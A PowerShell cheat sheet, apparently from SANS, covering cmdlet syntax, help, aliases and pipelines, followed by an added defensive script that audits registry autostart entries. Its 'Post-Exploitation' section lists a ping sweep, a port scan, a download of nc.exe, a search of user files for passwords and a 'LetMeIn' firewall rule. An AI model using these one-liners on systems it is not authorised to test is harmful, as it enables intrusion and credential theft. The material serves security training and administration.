Powershell Cheat Sheet

PowerShell Cheat Sheet v. 4.0
POCKET REFERENCE GUIDE
http://www.sans.org

Purpose

The purpose of this cheat sheet is to describe some common options and techniques for use in Microsoft's PowerShell.

PowerShell Overview

PowerShell Background
PowerShell is the successor to command.com, cmd.exe and cscript. Initially released as a separate download, it is now built in to all modern versions of Microsoft Windows. PowerShell syntax takes the form of verb-noun patterns implemented in cmdlets.

Launching PowerShell
PowerShell is accessed by pressing Start -> typing powershell and pressing Enter. Some operations require administrative privileges and can be accomplished by launching PowerShell as an elevated session. You can launch an elevated PowerShell by pressing Start -> typing powershell and pressing Shift-CTRL-Enter. Additionally, PowerShell cmdlets can be called from cmd.exe by typing: powershell -c "<command>".

Syntax

Cmdlets are small scripts that follow a dash-separated verb-noun convention such as "Get-Process".

Similar Verbs with Different Actions:
  New-     Creates a new resource
  Set-     Modifies an existing resource
  Get-     Retrieves an existing resource
  Read-    Gets information from a source, such as a file
  Find-    Used to look for an object
  Search-  Used to create a reference to a resource
  Start-   (asynchronous) begin an operation, such as starting a process
  Invoke-  (synchronous) perform an operation such as running a command

Parameters: Each verb-noun named cmdlet may have many parameters to control cmdlet functionality.

Objects: The output of most cmdlets are objects that can be passed to other cmdlets and further acted upon. This becomes important in pipelining cmdlets.

Finding Cmdlets

To get a list of all available cmdlets:
  PS C:\> Get-Command

Get-Command supports filtering. To filter cmdlets on the verb Set:
  PS C:\> Get-Command Set*
  or
  PS C:\> Get-Command -Verb Set

Or on the noun Process:
  PS C:\> Get-Command *Process
  or
  PS C:\> Get-Command -Noun Process

Getting Help

To get help with help:
  PS C:\> Get-Help

To read cmdlet self documentation:
  PS C:\> Get-Help <cmdlet>

Detailed help:
  PS C:\> Get-Help <cmdlet> -detailed

Usage examples:
  PS C:\> Get-Help <cmdlet> -examples

Full (everything) help:
  PS C:\> Get-Help <cmdlet> -full

Online help (if available):
  PS C:\> Get-Help <cmdlet> -online

Cmdlet Aliases

Aliases provide short references to long commands.

To list available aliases (alias alias):
  PS C:\> Get-Alias

To expand an alias into a full name:
  PS C:\> alias <unknown alias>
  PS C:\> alias gcm

Efficient PowerShell

Tab completion:
  PS C:\> get-child<TAB>
  expands to
  PS C:\> Get-ChildItem

Parameter shortening:
  PS C:\> ls -recurse
  is equivalent to:
  PS C:\> ls -r

Examples of passing cmdlet output down the pipeline:
  PS C:\> dir | group extension | sort
  PS C:\> Get-Service dhcp | Stop-Service -PassThru | Set-Service -StartupType Disabled

Useful Cmdlets (and aliases)

Get a directory listing (ls, dir, gci):
  PS C:\> Get-ChildItem

Copy a file (cp, copy, cpi):
  PS C:\> Copy-Item src.txt dst.txt

Move a file (mv, move, mi):
  PS C:\> Move-Item src.txt dst.txt

Find text within a file:
  PS C:\> Select-String -path c:\users\*.txt -pattern password
  PS C:\> ls -r c:\users -file | % {Select-String -path $_ -pattern password}

Display file contents (cat, type, gc):
  PS C:\> Get-Content file.txt

Get present directory (pwd, gl):
  PS C:\> Get-Location

Get a process listing (ps, gps):
  PS C:\> Get-Process

Get a service listing:
  PS C:\> Get-Service

Formatting output of a command (Format-List):
  PS C:\> ls | Format-List -property name

Paginating output:
  PS C:\> ls -r | Out-Host -paging

Get the SHA1 hash of a file:
  PS C:\> Get-FileHash -Algorithm SHA1 file.txt

Exporting output to CSV:
  PS C:\> Get-Process | Export-Csv procs.csv

PowerShell for Pen-Tester Post-Exploitation

Conduct a ping sweep:
  PS C:\> 1..255 | % {echo "10.10.10.$_"; ping -n 1 -w 100 10.10.10.$_ | Select-String ttl}

Conduct a port scan:
  PS C:\> 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.10.10.10",$_)) "Port $_ is open!"} 2>$null

Fetch a file via HTTP (wget in PowerShell):
  PS C:\> (New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/nc.exe","nc.exe")

Find all files with a particular name:
  PS C:\> Get-ChildItem "C:\Users\" -recurse -include *passwords*.txt

Get a listing of all installed Microsoft Hotfixes:
  PS C:\> Get-HotFix

Navigate the Windows registry:
  PS C:\> cd HKLM:\
  PS HKLM:\> ls

List programs set to start automatically in the registry:
  PS C:\> Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\run

Convert string from ASCII to Base64:
  PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("PS FTW!"))

List and modify the Windows firewall rules:
  PS C:\> Get-NetFirewallRule -all
  PS C:\> New-NetFirewallRule -Action Allow -DisplayName LetMeIn -RemoteAddress 10.10.10.25

5 PowerShell Essentials

Concept | What's it Do? | A Handy Alias
Get-Help [cmdlet] -examples | Shows help & examples | help [cmdlet] -examples
Get-Command *[string]* | Shows a list of commands | gcm *[string]*
[cmdlet] | Get-Member | Shows properties & methods | [cmdlet] | gm
ForEach-Object { $_ } | Takes each item on the pipeline and handles it as $_ | [cmdlet] | % { $_ }
Select-String -path [file] -pattern [string] | Searches for strings in files or output, like grep | sls -path [file] -pattern [string]

Pipelining, Loops, and Variables

Piping cmdlet output to another cmdlet:
  PS C:\> Get-Process | Format-List -property name

ForEach-Object in the pipeline (alias %):
  PS C:\> ls *.txt | ForEach-Object {cat $_}

Where-Object condition (alias where or ?):
  PS C:\> Get-Process | Where-Object {$_.name -eq "notepad"}

Generating ranges of numbers and looping:
  PS C:\> 1..10
  PS C:\> 1..10 | % {echo "Hello!"}

Creating and listing variables:
  PS C:\> $tmol = 42
  PS C:\> ls variable:
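As an added example (not from the SANS cheat sheet), the script below chains several of the cmdlets listed above into one defensive check: it reads the Run keys, hashes each autostart binary with Get-FileHash, and exports a CSV baseline with Export-Csv. The HKCU key and the output file name autostart-audit.csv are assumptions, not from the sheet.

```powershell
# Added example: audit registry autostart entries (HKLM from the sheet; HKCU assumed).
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
)
$report = 'autostart-audit.csv'   # assumed output path

$results = foreach ($key in $runKeys) {
    if (-not (Test-Path -LiteralPath $key)) { continue }

    # Get-ItemProperty returns one object whose properties are the value names;
    # PowerShell adds PSPath/PSChildName etc., which we skip via the PS* filter.
    $entries = (Get-ItemProperty -LiteralPath $key).PSObject.Properties |
        Where-Object { $_.Name -notlike 'PS*' }

    foreach ($entry in $entries) {
        # The value data is a command line; pull the executable path, quoted or not.
        $cmd = [string]$entry.Value
        if ($cmd -match '^"([^"]+)"') { $exe = $Matches[1] }
        else { $exe = ($cmd -split ' ')[0] }
        $exe = [Environment]::ExpandEnvironmentVariables($exe)

        # Hash the binary so the CSV can be diffed against a known-good baseline.
        $hash = $null
        if (Test-Path -LiteralPath $exe) {
            $hash = (Get-FileHash -LiteralPath $exe -Algorithm SHA256).Hash
        }

        [PSCustomObject]@{
            Key     = $key
            Name    = $entry.Name
            Command = $cmd
            Path    = $exe
            Exists  = [bool]$hash
            SHA256  = $hash
        }
    }
}

$results | Export-Csv -Path $report -NoTypeInformation

# Entries whose binary is missing (or could not be resolved) deserve a closer look.
$results | Where-Object { -not $_.Exists } | Format-List
```

Run it once on a clean build to capture the baseline CSV, then compare later runs against it to spot new or changed autostart entries.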
